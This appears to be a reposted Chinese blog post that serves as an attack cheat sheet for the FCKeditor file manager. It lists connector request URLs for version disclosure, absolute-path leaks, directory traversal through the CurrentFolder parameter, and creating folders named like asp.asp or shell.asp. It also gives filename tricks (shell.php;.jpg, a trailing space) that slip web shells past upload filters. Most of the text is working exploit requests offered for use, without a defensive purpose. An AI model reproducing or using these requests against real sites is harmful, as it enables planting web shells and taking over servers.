FCK上传总结

来源：互联网发布：c语言小游戏代码编辑：程序博客网时间：2024/06/06 14:13

适合asp站点
1、浏览查看文件
http://127.0.0.1/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp
2、创建asp.asp文件夹
http://127.0.0.1/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=Test Folder
或
http://127.0.0.1/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/asp.asp&NewFolderName=Test Folder
上传asp小马注意为txt格式得到文件名，文件名一般开头为日期
3、找到上传的小马，一般地址为
http://127.0.0.1/uploadfile/file/asp.asp/2007010112345678999.txt

4、上传asp大马

1、查看编辑器版本
/fckeditor/editor/dialog/fck_about.html
/fckeditor/_samples/default.html中“关于”
常用版本号：
2.6.5 Build 23959
2.6.4 Build 21629
2、爆绝对路径（浏览查看文件）
/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/asp/connector.asp
或
/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/aspx/connector.aspx
或
/fckeditor/editor/filemanager/browser/default/browser.html?&connector=../../connectors/php/connector.php

/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php
支持php的通杀，2.6.4和2.6.5测试未通过

/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

3、遍历目录
/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

Version 2.4.1 测试通过
修改CurrentFolder 参数使用 ../../来进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp
根据返回的XML 信息可以查看网站所有的目录。
fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
也可以直接浏览盘符：
JSP 版本：
fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/

4、jsp上传
/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector.jsp
/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

5、Version < =2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。

Upload a new file:

6、 fckeditor 文件上传“.”变“_”下划线的绕过方法
很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。试试上传1.asp;jpg
6.1：提交shell.php+空格绕过
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。
6.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。

7、突破建立文件夹
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684

/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
8、 fckeditor 中test 文件的上传地址
/fckeditor/editor/filemanager/browser/default/connectors/test.html
/fckeditor/editor/filemanager/upload/test.html
/fckeditor/editor/filemanager/connectors/test.html
/fckeditor/editor/filemanager/connectors/uploadtest.html

参考内容：
1、《fckeditor 漏洞汇总》http://blog.zahuibbs.com/?p=558
2、《对fckeditor的一些漏洞总结》 http://www.st999.cn/blog/?action=show&id=84
3、《fckeditor漏洞总结》 http://hi.baidu.com/0x残剑/blog/item/1b96a6cbe7b57a46b219a825.html
4、《新突破fckeditor漏洞》 http://gov.com.im/art_design/2011/0207/fck.html
5、《编辑器漏洞总结》 http://hi.baidu.com/???day/blog/item/b86013f61ecc3b5fd7887dc0.html

0 0